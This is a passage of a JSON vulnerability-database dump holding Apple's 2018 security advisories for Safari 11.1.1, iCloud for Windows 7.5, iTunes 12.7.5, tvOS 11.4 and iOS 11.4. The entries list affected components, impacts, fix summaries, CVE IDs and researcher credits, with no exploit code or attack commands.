You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.1.1\n\nReleased June 1, 2018\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4205: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. 
This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) 
working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. 
This issue was addressed with improved input validation.\n\nCVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\nEntry added July 10, 2018\n", "edition": 2, "modified": "2019-10-08T03:41:58", "published": "2019-10-08T03:41:58", "id": "APPLE:HT208854", "href": "https://support.apple.com/kb/HT208854", "title": "About the security content of Safari 11.1.1 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:58", "bulletinFamily": "software", "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iCloud for Windows 7.5\n\nReleased June 1, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri (@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. 
This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project 
Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:48:52", "published": "2019-10-08T03:48:52", "id": "APPLE:HT208853", "href": "https://support.apple.com/kb/HT208853", "title": "About the security content of iCloud for Windows 7.5 - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:45", "bulletinFamily": "software", "cvelist": ["CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4145", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", 
"CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iTunes 12.7.5 for Windows\n\nReleased May 29, 2018\n\n**CoreGraphics**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to modify the state of the Keychain\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4225: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Windows 7 and later\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4226: Abraham Masri 
(@cheesecakeufo)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a malicious website may lead 
to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. 
This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4145: found by OSS-Fuzz\n\nEntry added October 18, 2018\n", "edition": 2, "modified": "2019-10-08T03:44:36", "published": "2019-10-08T03:44:36", "id": "APPLE:HT208852", "href": "https://support.apple.com/kb/HT208852", "title": "About the security content of iTunes 12.7.5 for Windows - Apple Support", "type": "apple", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:42:43", "bulletinFamily": "software", "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4188", "CVE-2018-4187", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4232", "CVE-2018-4243", "CVE-2018-4200"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: Apple TV 4K\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated 
privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. 
Ltd\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. 
This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed 
with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. 
This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 2, "modified": "2019-10-08T03:33:34", "published": "2019-10-08T03:33:34", "id": "APPLE:HT208850", "href": "https://support.apple.com/kb/HT208850", "title": "About the security content of tvOS 11.4 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:12", "bulletinFamily": "software", "cvelist": ["CVE-2018-4211", "CVE-2018-4252", "CVE-2018-4223", "CVE-2018-4100", "CVE-2018-4227", "CVE-2018-4239", "CVE-2018-4225", "CVE-2018-4194", "CVE-2018-4188", "CVE-2018-4250", "CVE-2018-4199", "CVE-2018-4202", "CVE-2018-4330", "CVE-2018-4238", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4190", "CVE-2018-4221", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4247", "CVE-2018-4232", "CVE-2018-4244", "CVE-2018-4215", "CVE-2018-4243", "CVE-2018-4226"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4215: Abraham Masri (@cheesecakeufo)\n\n**Bluetooth**\n\nAvailable for: iPhone X, iPhone 8, iPhone 8 Plus, iPad 6th generation, and iPad Air 2\n\nNot impacted: HomePod\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Contacts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted vcf file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of phone numbers. 
This issue was addressed with improved validation of phone numbers.\n\nCVE-2018-4100: Abraham Masri (@cheesecakeufo)\n\n**CoreGraphics**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4194: Jihui Lu of Tencent KeenLab, Yu Zhou of Ant-financial Light-Year Security Lab\n\nEntry added June 21, 2018\n\n**Core Bluetooth**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4330: Apple\n\nEntry added August 8, 2018\n\n**FontParser**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**iBooks**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in iBooks\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4202: Jerry Decime\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be 
able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\nEntry updated October 8, 2019\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added October 30, 2018\n\n**Magnifier**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A person with physical access to an iOS device may be able to view the last image used in Magnifier from the lockscreen\n\nDescription: A permissions issue existed in Magnifier. This was addressed with additional permission checks.\n\nCVE-2018-4239: an anonymous researcher\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker may be able to exfiltrate the contents of S/MIME-encrypted e-mail\n\nDescription: An issue existed in the handling of 